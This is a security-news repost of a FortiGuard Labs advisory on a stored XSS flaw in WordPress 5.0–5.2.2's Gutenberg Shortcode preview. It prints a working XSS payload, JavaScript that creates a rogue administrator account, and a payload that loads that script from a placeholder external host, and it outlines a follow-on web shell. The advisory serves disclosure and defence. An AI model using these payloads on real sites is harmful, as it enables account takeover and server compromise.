Firewall News

Top Menu

  • Home
  • Our Blog
  • Contact Us

Main Menu

  • Software Updates
  • Alerts & Bugs
  • Out of the Box
  • Home
  • Our Blog
  • Contact Us

Firewall News

Firewall News

  • Software Updates
    • WatchGuard logo

      TDR 6.0.0 is now integrated into WatchGuard Cloud

      04/01/2021
      0
    • Sophos Logo

      XG Firewall 17.5 MR14 Released

      30/07/2020
      0
    • Sophos Logo

      Sophos Firewall Manager SFM 17.1 MR4 Released

      27/07/2020
      0
    • Sophos Logo

      Sophos Enterprise console - Endpoint Security and Control v10.8.9 for Windows has ...

      16/07/2020
      0
    • Sophos Logo

      Sophos iView v3 MR-2 Released

      07/07/2020
      0
    • Sophos Logo

      SD-RED Firmware 3.0.002 Pattern Update

      06/07/2020
      0
    • Sophos Logo

      XG Firewall 17.5 MR13 Released

      06/07/2020
      0
    • Sophos Logo

      End-of-Life (EoL) announcement for old firmware v17 and v17.1 for XG Firewall

      03/07/2020
      0
    • WatchGuard logo

      Fireware 12.5.4 Now Available

      01/07/2020
      0
  • Alerts & Bugs
    • Sophos Logo

      Advisory: Sophos Central Maintenance scheduled for Saturday, April 2nd, 2022

      29/03/2022
      0
    • Sophos Logo

      Sophos: Important Product Lifecycle Updates

      03/03/2022
      0
    • WatchGuard logo

      WatchGuard Support Alert

      23/02/2022
      0
    • Sophos Logo

      Sophos: Important Product Lifecycle Reminder

      03/02/2022
      0
    • Sophos Logo

      Sophos: Product Lifecycle Information: Extended Support for Windows 7 and Windows Server ...

      31/01/2022
      0
    • Sophos Logo

      End-of-Life (EoL) announcement for Sophos SSL VPN Client

      29/11/2021
      0
    • WatchGuard logo

      WatchGuard: macOS Monterey 12.0.1 Does Not Support the AuthPoint Logon App

      09/11/2021
      0
    • Sophos Logo

      Sophos UTM Manager (SUM) End of Distribution

      04/11/2021
      0
    • WatchGuard logo

      WatchGuard: End of Sale Notice: AP420

      01/11/2021
      0
  • Out of the Box
    • WatchGuard’s Firebox T80 Earns 5-Star Rating in SC Labs Review

      17/11/2020
      0
    • WatchGuard Wins Big in CRN 2020 Tech Innovator Awards

      16/11/2020
      0
    • Coronavirus scams: what to look for and how to stop them

      02/04/2020
      0
    • Dell SonicWALL TZ 300

      Out the Box - Dell SonicWALL TZ 300

      05/07/2016
      0
    • Dell SonicWALL TZ SOHO

      Out the Box - Dell SonicWALL TZ SOHO

      05/07/2016
      0
    • WatchGuard Firebox T50

      WatchGuard Firebox T50

      31/03/2016
      0
    • WatchGuard Firebox M200

      WatchGuard Firebox M200

      31/03/2016
      0
Alerts & BugsFortinet
Home›Alerts & Bugs›Fortinet – WordPress (Core) Stored XSS Vulnerability

Fortinet – WordPress (Core) Stored XSS Vulnerability

By admin
12/09/2019
2105
0
Share:
Fortinet

FortiGuard Labs Breaking Threat Research

Overview

WordPress is the world’s most popular Content Management System (CMS). It has 60.4% of the global CMS market share, which is far higher than the second-place Joomla!, which only has 5.2% of the market share. As a result, over a third of all of the websites on the Internet were built using WordPress.

The FortiGuard Labs team recently discovered a stored Cross-Site Scripting (XSS) zero-day vulnerability in WordPress. This XSS vulnerability is caused by the new built-in editor Gutenberg found in WordPress 5.0. The editor fails to filter the JavaScript/HTML code in the Shortcode error message. This allows a remote attacker with Contributor or higher permission to execute arbitrary JavaScript/HTML code in the browser of victims who access the compromised webpage. If the victim has high permission, such as an administrator, the attacker could even compromise the web server.

This stored XSS vulnerability affects WordPress versions from 5.0 to 5.2.2.

Analysis

In WordPress 5.0, users can add Shortcode blocks to a post. When adding certain HTML encoded characters like “&lt;” to the Shortcode block and then re-opening this post, it shows an error message and previews it by decoding the “&lt;” to “<”. 

Figure 1. Inserting HTML encoded characters into a Shortcode block

Figure 1. Inserting HTML encoded characters into a Shortcode block

Figure 2. A Shortcode error message with preview

Figure 2. A Shortcode error message with preview

The XSS filter in this preview can be easily bypassed with the PoC “”&gt;&lt;img src=1 onerror=prompt(1)&gt;”. 

Figure 3. Inserting PoC code into the Shortcode block

Figure 3. Inserting PoC code into the Shortcode block

When any victim views this post, the XSS code will be executed in their browser. 

Figure 4. WordPress Shortcode Preview XSS

Figure 4. WordPress Shortcode Preview XSS

If the victim happens to have admin rights, the criminal could then exploit this vulnerability to gain control of the administrator’s account, leverage the WordPress built-in function to GetShell, then take control of the server.

For example, the attacker could host JavaScript file, such as wpaddadmin[.]js (described in the link), on their webserver. This JavaScript code will add a WordPress administrator account with the username “attacker” and password “attacker”.

  1. // Send a GET request to the URL ‘/wordpress/wp-admin/user-new.php’, and extract the current ‘nonce’ value  
  2. var ajaxRequest = new XMLHttpRequest();  
  3. var requestURL = “/wordpress/wp-admin/user-new.php”;  
  4. var nonceRegex = /ser” value=”([^”]*?)”/g;  
  5. ajaxRequest.open(“GET”, requestURL, false);  
  6. ajaxRequest.send();  
  7. var nonceMatch = nonceRegex.exec(ajaxRequest.responseText);  
  8. var nonce = nonceMatch[1];  
  9.   
  10. // Construct a POST query, using the previously extracted ‘nonce’ value, and create a new user with an arbitrary username / password, as an Administrator  
  11. var params = “action=createuser&_wpnonce_create-user=”+nonce+”&user_login=attacker&[email protected]&pass1=attacker&pass2=attacker&role=administrator”;  
  12. ajaxRequest = new XMLHttpRequest();  
  13. ajaxRequest.open(“POST”, requestURL, true);  
  14. ajaxRequest.setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”);  
  15. ajaxRequest.send(params);  

The attacker could then insert the JavaScript using the following PoC.

“”&gt;&lt;img src=1 onerror=”javascript&colon;(function () { var url = ‘http://aaa.bbb.ccc.ddd/ wpaddadmin.js’;if (typeof beef == ‘undefined’) { var bf = document.createElement(‘script’); bf.type = ‘text/javascript’; bf.src = url; document.body.appendChild(bf);}})();”&gt;”

Figure 5. Inserting XSS code to add an administrator account

Figure 5. Inserting XSS code to add an administrator account

Once a victim with high permission views this post, the administrator account “attacker” will be created. 

Figure 6. XSS code is executed

Figure 6. XSS code is executed

Figure 7. The “attacker” account with administrator permission created by the XSS code

Figure 7. The “attacker” account with administrator permission created by the XSS code

The attacker could then modify an existing php file to a webshell and use the webshell to take control of the webserver. 

Figure 8. Adding a web shell with the attacker’s account

Figure 8. Adding a web shell with the attacker’s account

Figure 9. Taking control of the webserver

Figure 9. Taking control of the webserver

Solution

FortiGuard Labs contacted WordPress about this zero-day discovery, and they have issued a patch. All users of vulnerable versions of WordPress are encouraged to upgrade to the latest WordPress version or apply the latest patches immediately.

Additionally, organizations that have deployed Fortinet IPS solutions are already protected from this vulnerability with the following signature:

WordPress.Shortcode.Preview.XSS

Previous Article

Watchguard – Now Available: Fireware 12.5.1

Next Article

Fortinet Wins SE Labs Best Network Security ...

0
Shares
  • 0
  • +
  • 0
  • 0
  • 0
  • 0

Related articles More from author

  • WatchGuard logo
    Alerts & BugsWatchGuard

    WatchGuard: Hafnium Exploit: Important Information You Need to Know

    12/03/2021
    By admin
  • Sophos Logo
    Alerts & BugsSophos

    Sophos: Vulnerability Affecting Cyberoam Appliances

    09/12/2017
    By admin
  • Sophos Logo
    Alerts & BugsSophos

    Advisory: Sophos Central Maintenance scheduled for Saturday November 9th, 2019

    05/11/2019
    By admin
  • SonicWall Logo
    Alerts & BugsSonicWALL

    Security Notice: SonicWall Email Security Zero-Day Vulnerabilities

    20/04/2021
    By admin
  • Sophos Logo
    Alerts & BugsSophos

    Sophos Advisory: Reflexion Planned maintenance – Friday, February 21st, 2020

    20/02/2020
    By admin
  • Alerts & BugsTrendMicro

    Trend Micro Remote Manager (TMRM) Systems Upgrade

    05/08/2020
    By admin

  • SonicWall SMA
    Software UpdatesSonicWALL

    Move to the Cloud and Enable Secure Collaboration with SonicWall SMA OS 12.1

  • News

    Securing Your Dynamic Cloud Strategy

  • SonicWall SonicOS release
    Software UpdatesSonicWALL

    SonicWall announces two new SonicOS releases

Timeline

  • 29/03/2022

    Advisory: Sophos Central Maintenance scheduled for Saturday, April 2nd, 2022

  • 03/03/2022

    Sophos: Important Product Lifecycle Updates

  • 01/03/2022

    Shoring up your cybersecurity posture in light of ongoing crisis

  • 23/02/2022

    WatchGuard Support Alert

  • 03/02/2022

    Sophos: Important Product Lifecycle Reminder

Sponsored Links

Latest Comments

  • Paul Sillars
    on
    21/06/2016
    I received this in an email this morning, it was the first I heard about it ...

    Dell Software Group sold to help fund looming EMC deal

  • Paul Sillars
    on
    20/06/2016
    This is going to be an interesting one to watch. Especially after today's announcement that ...

    Ingram Micro gets distribution access to Dell’s security range in Australia

Find us on Facebook

Firewall.News Logo

This site serves more as a reference point for some of the major security vendor's updates and product/press releases

It will never be a definitive list, but it helps our customers keep up to date and also allows us to express our comment and observations as well.

About us

  • PO Box 451, North Lakes, Queensland, 4509, Australia
  • [email protected]
  • Recent

  • Popular

  • Comments

  • Sophos Logo

    Advisory: Sophos Central Maintenance scheduled for Saturday, April 2nd, 2022

    By admin
    29/03/2022
  • Sophos Logo

    Sophos: Important Product Lifecycle Updates

    By admin
    03/03/2022
  • Shoring up your cybersecurity posture in light of ongoing crisis

    By admin
    01/03/2022
  • WatchGuard logo

    WatchGuard Support Alert

    By admin
    23/02/2022
  • Dell SonicWALL Supermassive

    Ingram Micro gets distribution access to Dell’s security range in Australia

    By admin
    14/06/2016
  • Francisco Partners and Elliott Management to Acquire the Dell Software Group

    Dell Software Group sold to help fund looming EMC deal

    By admin
    21/06/2016
  • WatchGuard Firebox M500 – The Cure for HTTPS Performance Headaches

    By admin
    05/03/2015
  • Sophos Logo

    Advisory: Sophos Central Maintenance scheduled for Saturday, April 2nd, 2022

    By admin
    29/03/2022
  • Paul Sillars
    on
    21/06/2016

    Dell Software Group sold to help fund looming EMC deal

    I received this in ...
  • Paul Sillars
    on
    20/06/2016

    Ingram Micro gets distribution access to Dell’s security range in Australia

    This is going to ...

Follow Me

  • Contact
  • About Us
  • Home